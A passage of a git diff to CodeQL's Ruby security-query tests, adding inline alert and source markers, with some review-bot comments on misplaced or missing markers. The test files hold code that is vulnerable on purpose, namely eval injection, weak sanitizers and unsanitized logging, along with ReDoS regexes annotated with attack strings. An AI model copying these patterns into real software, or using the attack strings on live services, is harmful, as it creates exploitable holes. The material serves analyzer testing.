+++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/UnsafeCodeConstruction.qlref @@ -1 +1,2 @@ -queries/security/cwe-094/UnsafeCodeConstruction.ql \ No newline at end of file +query: queries/security/cwe-094/UnsafeCodeConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb index b69048f63288..3c92cea5c8ce 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -1,16 +1,16 @@ class Foobar - def foo1(target) - eval("foo = #{target}") # NOT OK + def foo1(target) # $ Source + eval("foo = #{target}") # NOT OK # $ Alert end # sprintf - def foo2(x) - eval(sprintf("foo = %s", x)) # NOT OK + def foo2(x) # $ Source + eval(sprintf("foo = %s", x)) # NOT OK # $ Alert end # String#% - def foo3(x) - eval("foo = %{foo}" % {foo: x}) # NOT OK + def foo3(x) # $ Source + eval("foo = %{foo}" % {foo: x}) # NOT OK # $ Alert end def indirect_eval(x) 
@@ -25,42 +25,42 @@ def named_code(code) eval("def \n #{code} \n end") # OK - parameter is named code end - def joinStuff(my_arr) - eval(my_arr.join("\n")) # NOT OK + def joinStuff(my_arr) # $ Source + eval(my_arr.join("\n")) # NOT OK # $ Alert end - def joinWithElemt(x) + def joinWithElemt(x) # $ Source arr = [x, "foobar"] - eval(arr.join("\n")) # NOT OK + eval(arr.join("\n")) # NOT OK # $ Alert end - def pushArr(x, y) + def pushArr(x, y) # $ Source arr = [] arr.push(x) - eval(arr.join("\n")) # NOT OK + eval(arr.join("\n")) # NOT OK # $ Alert arr2 = [] arr2 << y - eval(arr.join("\n")) # NOT OK + eval(arr.join("\n")) # NOT OK # $ Alert end - def hereDoc(x) + def hereDoc(x) # $ Source foo = <<~HERE - #{x} + #{x} # $ Alert HERE eval(foo) # NOT OK end - def string_concat(x) - foo = "foo = " + x + def string_concat(x) # $ Source + foo = "foo = " + x # $ Alert eval(foo) # NOT OK end - def join_indirect(x, y) + def join_indirect(x, y) # $ Source arr = Array(x) - eval(arr.join(" ")) # NOT OK + eval(arr.join(" ")) # NOT OK # $ Alert arr2 = [Array(["foo = ", y]).join(" ")] - eval(arr2.join("\n")) # NOT OK + eval(arr2.join("\n")) # NOT OK # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/BadTagFilter.qlref b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/BadTagFilter.qlref index 6780ef6d4c88..d0ba313d71eb 100644 --- a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/BadTagFilter.qlref +++ b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/BadTagFilter.qlref @@ -1 +1,2 @@ -queries/security/cwe-116/BadTagFilter.ql \ No newline at end of file +query: queries/security/cwe-116/BadTagFilter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/test.rb b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/test.rb index dd4a074c7846..d9940d35551e 100644 --- a/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/test.rb 
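Review bot: In `hereDoc`, the new `# $ Alert` marker is placed on the `#{x}` line inside the `<<~HERE` body, where it is string content rather than a Ruby comment. If the inline-expectations postprocessor reads only comment tokens (to be confirmed by running the test), this expectation is never seen and the alert on that line is reported as unexpected; the marker text also becomes part of the string passed to `eval(foo)`. Separately, in `pushArr` the second call is still `eval(arr.join("\n"))` after `arr2 << y`, and the `#select` rows for lines 40 and 44 both name `arr` with source `x`, so the single `# $ Source` on `def pushArr(x, y)` covers only `x` and the flow from `y` is not exercised. If that flow was meant to be tested, the line would read `eval(arr2.join("\n")) # NOT OK # $ Alert`, with the `.expected` file regenerated.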
+++ b/ruby/ql/test/query-tests/security/cwe-116/BadTagFilter/test.rb @@ -1,22 +1,22 @@ filters = [ - /.*?<\/script>/i, # NOT OK - doesn't match newlines or `` - /.*?<\/script>/im, # NOT OK - doesn't match `` + /.*?<\/script>/i, # NOT OK - doesn't match newlines or `` # $ Alert + /.*?<\/script>/im, # NOT OK - doesn't match `` # $ Alert /.*?<\/script[^>]*>/im, # OK //im, # OK - we don't care regexps that only match comments /)|([^\/\s>]+)[\S\s]*?>/, # NOT OK - doesn't match comments with the right capture groups - /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, # NOT OK - capture groups + /]*>([\s\S]*?)<\/script>/gi, # NOT OK - too strict matching on the end tag # $ Alert + /<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>/, # NOT OK - doesn't match comments with the right capture groups # $ Alert + /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, # NOT OK - capture groups # $ Alert ] doFilters(filters) \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/IncompleteSanitization.qlref b/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/IncompleteSanitization.qlref index 966c74aaf64b..e7f5463e7941 100644 --- a/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/IncompleteSanitization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/IncompleteSanitization.qlref @@ -1 +1,2 @@ -queries/security/cwe-116/IncompleteSanitization.ql \ No newline at end of file +query: queries/security/cwe-116/IncompleteSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/tst.rb b/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/tst.rb index f59fdd332aed..f9b37b12c6af 100644 
--- a/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/tst.rb
+++ b/ruby/ql/test/query-tests/security/cwe-116/IncompleteSanitization/tst.rb
@@ -1,91 +1,91 @@ def bad1(s) - s.sub "'", "" # NOT OK - s.sub! "'", "" # NOT OK + s.sub "'", "" # NOT OK # $ Alert + s.sub! "'", "" # NOT OK # $ Alert end def bad2(s) - s.sub /'/, "" # NOT OK - s.sub! /'/, "" # NOT OK + s.sub /'/, "" # NOT OK # $ Alert + s.sub! /'/, "" # NOT OK # $ Alert end def bad3(s1, s2, s3) - s1.gsub /'/, "\\'" # NOT OK - s1.gsub /'/, '\\\'' # NOT OK - s2.gsub! /'/, "\\'" # NOT OK - s3.gsub! /'/, '\\\'' # NOT OK + s1.gsub /'/, "\\'" # NOT OK # $ Alert + s1.gsub /'/, '\\\'' # NOT OK # $ Alert + s2.gsub! /'/, "\\'" # NOT OK # $ Alert + s3.gsub! /'/, '\\\'' # NOT OK # $ Alert end def bad4(s1, s2, s3) - s1.gsub /'/, "\\\\\\&" # NOT OK - s1.gsub /'/, '\\\\\&' # NOT OK - s2.gsub! /'/, "\\\\\\&" # NOT OK - s3.gsub! /'/, '\\\\\&' # NOT OK + s1.gsub /'/, "\\\\\\&" # NOT OK # $ Alert + s1.gsub /'/, '\\\\\&' # NOT OK # $ Alert + s2.gsub! /'/, "\\\\\\&" # NOT OK # $ Alert + s3.gsub! /'/, '\\\\\&' # NOT OK # $ Alert end def bad5(s) - s.gsub /['"]/, '\\\\\&' # NOT OK - s.gsub! /['"]/, '\\\\\&' # NOT OK + s.gsub /['"]/, '\\\\\&' # NOT OK # $ Alert + s.gsub! /['"]/, '\\\\\&' # NOT OK # $ Alert end def bad6(s) - s.gsub /(['"])/, '\\\\\\1' # NOT OK - s.gsub! /(['"])/, '\\\\\\1' # NOT OK + s.gsub /(['"])/, '\\\\\\1' # NOT OK # $ Alert + s.gsub! /(['"])/, '\\\\\\1' # NOT OK # $ Alert end def bad7(s) - s.gsub /('|")/, '\\\\\1' # NOT OK - s.gsub! /('|")/, '\\\\\1' # NOT OK + s.gsub /('|")/, '\\\\\1' # NOT OK # $ Alert + s.gsub! /('|")/, '\\\\\1' # NOT OK # $ Alert end def bad8(s) - s.sub '|', '' # NOT OK - s.sub! '|', '' # NOT OK + s.sub '|', '' # NOT OK # $ Alert + s.sub! '|', '' # NOT OK # $ Alert end def bad9(s1, s2, s3, s4) - s1.gsub /"/, "\\\"" # NOT OK - s1.gsub /"/, '\\"' # NOT OK - s1.gsub '"', '\\"' # NOT OK - s2.gsub! /"/, "\\\"" # NOT OK - s3.gsub! /"/, '\\"' # NOT OK - s4.gsub! '"', '\\"' # NOT OK + s1.gsub /"/, "\\\"" # NOT OK # $ Alert + s1.gsub /"/, '\\"' # NOT OK # $ Alert + s1.gsub '"', '\\"' # NOT OK # $ Alert + s2.gsub! 
/"/, "\\\"" # NOT OK # $ Alert + s3.gsub! /"/, '\\"' # NOT OK # $ Alert + s4.gsub! '"', '\\"' # NOT OK # $ Alert end def bad10(s) - s.sub "/", "%2F" # NOT OK - s.sub! "/", "%2F" # NOT OK + s.sub "/", "%2F" # NOT OK # $ Alert + s.sub! "/", "%2F" # NOT OK # $ Alert end def bad11(s) - s.sub "%25", "%" # NOT OK - s.sub! "%25", "%" # NOT OK + s.sub "%25", "%" # NOT OK # $ Alert + s.sub! "%25", "%" # NOT OK # $ Alert end def bad12(s) - s.sub %q['], %q[] # NOT OK - s.sub! %q['], %q[] # NOT OK + s.sub %q['], %q[] # NOT OK # $ Alert + s.sub! %q['], %q[] # NOT OK # $ Alert end def bad13(s) - s.sub "'" + "", "" # NOT OK - s.sub! "'" + "", "" # NOT OK + s.sub "'" + "", "" # NOT OK # $ Alert + s.sub! "'" + "", "" # NOT OK # $ Alert end def bad14(s) - s.sub "'", "" + "" # NOT OK - s.sub! "'", "" + "" # NOT OK + s.sub "'", "" + "" # NOT OK # $ Alert + s.sub! "'", "" + "" # NOT OK # $ Alert end def bad15(s) - s.sub "'" + "", "" + "" # NOT OK - s.sub! "'" + "", "" + "" # NOT OK + s.sub "'" + "", "" + "" # NOT OK # $ Alert + s.sub! "'" + "", "" + "" # NOT OK # $ Alert end def bad16(s) indirect = /'/ - s.sub(indirect, "") # NOT OK - s.sub!(indirect, "") # NOT OK + s.sub(indirect, "") # NOT OK # $ Alert + s.sub!(indirect, "") # NOT OK # $ Alert end def good1a(s) @@ -212,15 +212,15 @@ def good13a(s) s.sub('[', '').sub(']', '') # OK s.sub('(', '').sub(')', '') # OK s.sub('{', '').sub('}', '') # OK - s.sub('<', '').sub('>', '') # NOT OK: too common as a bad HTML sanitizer + s.sub('<', '').sub('>', '') # NOT OK: too common as a bad HTML sanitizer # $ Alert - s.sub('[', '\\[').sub(']', '\\]') # NOT OK - s.sub('{', '\\{').sub('}', '\\}') # NOT OK + s.sub('[', '\\[').sub(']', '\\]') # NOT OK # $ Alert + s.sub('{', '\\{').sub('}', '\\}') # NOT OK # $ Alert s = s.sub('[', '') # OK s = s.sub(']', '') # OK s.sub(/{/, '').sub(/}/, '') # OK - s.sub(']', '').sub('[', '') # probably OK, but still flagged + s.sub(']', '').sub('[', '') # probably OK, but still flagged # $ Alert end def good13b(s1) 
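Review bot: In the `@@ -212,15 +212,15 @@` hunk, the line `s.sub(']', '').sub('[', '') # probably OK, but still flagged` now carries a plain `# $ Alert`, which records a known false positive as if it were an intended result. The inline-expectations format has a `SPURIOUS:` prefix for exactly this case, so `# $ SPURIOUS: Alert` keeps the test passing while leaving the false positive visible to whoever next tunes the incomplete-sanitization query. `good13a` starts above this hunk.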
@@ -245,8 +245,8 @@ def newlines_a(a, b, c) # motivation for whitelist `which emacs`.sub("\n", "") # OK - a.sub("\n", "").sub(b, c) # NOT OK - a.sub(b, c).sub("\n", "") # NOT OK + a.sub("\n", "").sub(b, c) # NOT OK # $ Alert + a.sub(b, c).sub("\n", "") # NOT OK # $ Alert end def newlines_b(a, b, c) @@ -255,18 +255,18 @@ def newlines_b(a, b, c) output.sub!("\n", "") # OK d = a.dup - d.sub!("\n", "") # NOT OK + d.sub!("\n", "") # NOT OK # $ Alert d.sub!(b, c) e = a.dup d.sub!(b, c) - d.sub!("\n", "") # NOT OK + d.sub!("\n", "") # NOT OK # $ Alert end def bad_path_sanitizer(p1, p2) # attempt at path sanitization - p1.sub! "/../", "" # NOT OK - p2.sub "/../", "" # NOT OK + p1.sub! "/../", "" # NOT OK # $ Alert + p2.sub "/../", "" # NOT OK # $ Alert end def each_line_sanitizer(p1) diff --git a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected index 85299a98c289..123b65ba6767 100644 --- a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.expected 
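Review bot: In `newlines_b`, the second annotated `d.sub!("\n", "") # NOT OK # $ Alert` follows `e = a.dup`, but `e` is never used and both calls after it operate on `d` again. The reversed-order case this block appears to aim at (an assumption from the layout) is therefore not run on a fresh copy, and the new marker pins that behaviour as expected. If `e` was intended, the two lines would read `e.sub!(b, c)` and `e.sub!("\n", "") # NOT OK # $ Alert`, with the expected output regenerated. `newlines_b` starts above this hunk.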
@@ -1,3 +1,11 @@ +#select +| app/controllers/users_controller.rb:16:19:16:29 | unsanitized | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:17:19:17:41 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:27:16:27:39 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:27:16:27:39 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | +| app/controllers/users_controller.rb:34:33:34:43 | unsanitized | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:34:33:34:43 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | +| app/controllers/users_controller.rb:35:33:35:55 | ... + ... | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:35:33:35:55 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | +| app/controllers/users_controller.rb:49:19:49:30 | ...[...] 
| app/controllers/users_controller.rb:49:19:49:24 | call to params | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | Log entry depends on a $@. | app/controllers/users_controller.rb:49:19:49:24 | call to params | user-provided value | edges | app/controllers/users_controller.rb:15:5:15:15 | unsanitized | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | provenance | | | app/controllers/users_controller.rb:15:5:15:15 | unsanitized | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | provenance | | 
@@ -42,11 +50,3 @@ nodes | app/controllers/users_controller.rb:49:19:49:24 | call to params | semmle.label | call to params | | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | semmle.label | ...[...] | subpaths -#select -| app/controllers/users_controller.rb:16:19:16:29 | unsanitized | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:16:19:16:29 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:17:19:17:41 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:17:19:17:41 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:25:7:25:18 | unsanitized2 | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:27:16:27:39 | ... + ... | app/controllers/users_controller.rb:15:19:15:24 | call to params | app/controllers/users_controller.rb:27:16:27:39 | ... + ... | Log entry depends on a $@. | app/controllers/users_controller.rb:15:19:15:24 | call to params | user-provided value | -| app/controllers/users_controller.rb:34:33:34:43 | unsanitized | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:34:33:34:43 | unsanitized | Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | -| app/controllers/users_controller.rb:35:33:35:55 | ... + ... | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | app/controllers/users_controller.rb:35:33:35:55 | ... + ... 
| Log entry depends on a $@. | app/controllers/users_controller.rb:33:19:33:25 | call to cookies | user-provided value | -| app/controllers/users_controller.rb:49:19:49:30 | ...[...] | app/controllers/users_controller.rb:49:19:49:24 | call to params | app/controllers/users_controller.rb:49:19:49:30 | ...[...] | Log entry depends on a $@. | app/controllers/users_controller.rb:49:19:49:24 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.qlref b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.qlref index 3368edec4023..19ed712f4586 100644 --- a/ruby/ql/test/query-tests/security/cwe-117/LogInjection.qlref +++ b/ruby/ql/test/query-tests/security/cwe-117/LogInjection.qlref @@ -1 +1,2 @@ -queries/security/cwe-117/LogInjection.ql \ No newline at end of file +query: queries/security/cwe-117/LogInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-117/app/controllers/users_controller.rb b/ruby/ql/test/query-tests/security/cwe-117/app/controllers/users_controller.rb index 67e0e1cb1a7c..a49cce26d47e 100644 --- a/ruby/ql/test/query-tests/security/cwe-117/app/controllers/users_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-117/app/controllers/users_controller.rb @@ -12,9 +12,9 @@ def init_logger def read_from_params init_logger - unsanitized = params[:foo] - @logger.debug unsanitized # BAD: unsanitized user input - @logger.error "input: " + unsanitized # BAD: unsanitized user input + unsanitized = params[:foo] # $ Source + @logger.debug unsanitized # BAD: unsanitized user input # $ Alert + @logger.error "input: " + unsanitized # BAD: unsanitized user input # $ Alert sanitized = unsanitized.gsub("\n", "") @logger.fatal sanitized # GOOD: sanitized user input 
@@ -22,17 +22,17 @@ def read_from_params unsanitized2 = unsanitized.sub("\n", "") @logger.info do - unsanitized2 # BAD: partially sanitized user input + unsanitized2 # BAD: partially sanitized user input # $ Alert end - @logger << "input: " + unsanitized2 # BAD: partially sanitized user input + @logger << "input: " + unsanitized2 # BAD: partially sanitized user input # $ Alert end def read_from_cookies init_logger - unsanitized = cookies[:bar] - @logger.add(Logger::INFO) { unsanitized } # BAD: unsanitized user input - @logger.log(Logger::WARN) { "input: " + unsanitized } # BAD: unsanitized user input + unsanitized = cookies[:bar] # $ Source + @logger.add(Logger::INFO) { unsanitized } # BAD: unsanitized user input # $ Alert + @logger.log(Logger::WARN) { "input: " + unsanitized } # BAD: unsanitized user input # $ Alert end def html_sanitization @@ -46,7 +46,7 @@ def html_sanitization def inspect_sanitization init_logger - @logger.debug params[:foo] # BAD: unsanitized user input + @logger.debug params[:foo] # BAD: unsanitized user input # $ Alert @logger.debug params[:foo].inspect # GOOD: sanitized user input end end diff --git a/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/ReDoS.qlref b/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/ReDoS.qlref index 7f4557181d7c..12b806895875 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/ReDoS.qlref +++ b/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/ReDoS.qlref @@ -1 +1,2 @@ -queries/security/cwe-1333/ReDoS.ql +query: queries/security/cwe-1333/ReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/tst.rb b/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/tst.rb index 450d330dc928..8f45aff3c454 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/tst.rb +++ b/ruby/ql/test/query-tests/security/cwe-1333-exponential-redos/tst.rb 
@@ -1,7 +1,7 @@ # NOT GOOD; attack: "_" + "__".repeat(100) # Adapted from marked (https://github.com/markedjs/marked), which is licensed # under the MIT license; see file marked-LICENSE. -bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/ +bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/ # $ Alert # GOOD # Adapted from marked (https://github.com/markedjs/marked), which is licensed @@ -16,7 +16,7 @@ # NOT GOOD; attack: " '" + "\\\\".repeat(100) # Adapted from CodeMirror (https://github.com/codemirror/codemirror), # which is licensed under the MIT license; see file CodeMirror-LICENSE. -bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/ +bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/ # $ Alert # GOOD # Adapted from lulucms2 (https://github.com/yiifans/lulucms2). 
@@ -28,89 +28,89 @@ good3 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/ # NOT GOOD, variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) -bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/ +bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/ # $ Alert # NOT GOOD; attack: "/" + "\\/a".repeat(100) # Adapted from ANodeBlog (https://github.com/gefangshuai/ANodeBlog), # which is licensed under the Apache License 2.0; see file ANodeBlog-LICENSE. -bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/ +bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/ # $ Alert # NOT GOOD; attack: "##".repeat(100) + "\na" # Adapted from CodeMirror (https://github.com/codemirror/codemirror), # which is licensed under the MIT license; see file CodeMirror-LICENSE. -bad6 = /^([\s\[\{\(]|#.*)*$/ +bad6 = /^([\s\[\{\(]|#.*)*$/ # $ Alert # GOOD good4 = /(\r\n|\r|\n)+/ # BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. -actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/ +actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/ # $ Alert # NOT GOOD; attack: "a" + "[]".repeat(100) + ".b\n" # Adapted from Knockout (https://github.com/knockout/knockout), which is # licensed under the MIT license; see file knockout-LICENSE -bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i +bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i # $ Alert # GOOD good6 = /(a|.)*/ # Testing the NFA - only some of the below are detected. 
-bad7 = /^([a-z]+)+$/ -bad8 = /^([a-z]*)*$/ -bad9 = /^([a-zA-Z0-9])(([\\.-]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/ -bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/ +bad7 = /^([a-z]+)+$/ # $ Alert +bad8 = /^([a-z]*)*$/ # $ Alert +bad9 = /^([a-zA-Z0-9])(([\\.-]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/ # $ Alert +bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/ # $ Alert # NOT GOOD; attack: "[" + "][".repeat(100) + "]!" # Adapted from Prototype.js (https://github.com/prototypejs/prototype), which # is licensed under the MIT license; see file Prototype.js-LICENSE. -bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/ +bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/ # $ Alert # NOT GOOD; attack: "'" + "\\a".repeat(100) + '"' # Adapted from Prism (https://github.com/PrismJS/prism), which is licensed # under the MIT license; see file Prism-LICENSE. -bad12 = /("|')(\\?.)*?\1/ +bad12 = /("|')(\\?.)*?\1/ # $ Alert # NOT GOOD -bad13 = /(b|a?b)*c/ +bad13 = /(b|a?b)*c/ # $ Alert # NOT GOOD -bad15 = /(a|aa?)*b/ +bad15 = /(a|aa?)*b/ # $ Alert # GOOD good7 = /(.|\n)*!/ # NOT GOOD; attack: "\n".repeat(100) + "." 
-bad16 = /(.|\n)*!/m +bad16 = /(.|\n)*!/m # $ Alert # GOOD good8 = /([\w.]+)*/ # NOT GOOD -bad17 = Regexp.new '(a|aa?)*b' +bad17 = Regexp.new '(a|aa?)*b' # $ Alert # GOOD - not used as regexp good9 = '(a|aa?)*b' # NOT GOOD -bad18 = /(([\S\s]|[^a])*)"/ +bad18 = /(([\S\s]|[^a])*)"/ # $ Alert # GOOD - there is no witness in the end that could cause the regexp to not match good10 = /([^"']+)*/ # NOT GOOD -bad20 = /((.|[^a])*)"/ +bad20 = /((.|[^a])*)"/ # $ Alert # GOOD good10 = /((a|[^a])*)"/ # NOT GOOD -bad21 = /((b|[^a])*)"/ +bad21 = /((b|[^a])*)"/ # $ Alert # NOT GOOD -bad22 = /((G|[^a])*)"/ +bad22 = /((G|[^a])*)"/ # $ Alert # NOT GOOD -bad23 = /(([0-9]|[^a])*)"/ +bad23 = /(([0-9]|[^a])*)"/ # $ Alert # BAD - missing result bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/ 
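Review bot: The context line `bad24`, commented `# BAD - missing result`, ends this hunk with no annotation, so the known false negative is recorded only in prose; `# $ MISSING: Alert` on that line would make the test track it. The comment `# Testing the NFA - only some of the below are detected.` also no longer matches the lines under it, since `bad7` through `bad10` all receive `# $ Alert`; it could be shortened to `# Testing the NFA`. The hunk at `@@ -329,54` has the same two issues: `bad74` (`# NOT GOOD - but not detected.`) and, apparently, `bad87` carry no `MISSING` tag, and `bad77` keeps the comment `# NOT GOOD - but not detected` while gaining `# $ Alert`.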
@@ -122,55 +122,55 @@ bad26 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/ # NOT GOOD -bad27 = /(([a-z]|[d-h])*)"/ +bad27 = /(([a-z]|[d-h])*)"/ # $ Alert # NOT GOOD -bad27 = /(([^a-z]|[^0-9])*)"/ +bad27 = /(([^a-z]|[^0-9])*)"/ # $ Alert # NOT GOOD -bad28 = /((\d|[0-9])*)"/ +bad28 = /((\d|[0-9])*)"/ # $ Alert # NOT GOOD -bad29 = /((\s|\s)*)"/ +bad29 = /((\s|\s)*)"/ # $ Alert # NOT GOOD -bad30 = /((\w|G)*)"/ +bad30 = /((\w|G)*)"/ # $ Alert # GOOD good11 = /((\s|\d)*)"/ # NOT GOOD -bad31 = /((\d|\w)*)"/ +bad31 = /((\d|\w)*)"/ # $ Alert # NOT GOOD -bad32 = /((\d|5)*)"/ +bad32 = /((\d|5)*)"/ # $ Alert # BAD - \f is not handled correctly -bad33 = /((\s|[\f])*)"/ +bad33 = /((\s|[\f])*)"/ # $ Alert # BAD - \v is not handled correctly -bad34 = /((\s|[\v]|\\v)*)"/ +bad34 = /((\s|[\v]|\\v)*)"/ # $ Alert # NOT GOOD -bad35 = /((\f|[\f])*)"/ +bad35 = /((\f|[\f])*)"/ # $ Alert # NOT GOOD -bad36 = /((\W|\D)*)"/ +bad36 = /((\W|\D)*)"/ # $ Alert # NOT GOOD -bad37 = /((\S|\w)*)"/ +bad37 = /((\S|\w)*)"/ # $ Alert # NOT GOOD -bad38 = /((\S|[\w])*)"/ +bad38 = /((\S|[\w])*)"/ # $ Alert # NOT GOOD -bad39 = /((1s|[\da-z])*)"/ +bad39 = /((1s|[\da-z])*)"/ # $ Alert # NOT GOOD -bad40 = /((0|[\d])*)"/ +bad40 = /((0|[\d])*)"/ # $ Alert # NOT GOOD -bad41 = /(([\d]+)*)"/ +bad41 = /(([\d]+)*)"/ # $ Alert # GOOD - there is no witness in the end that could cause the regexp to not match good12 = 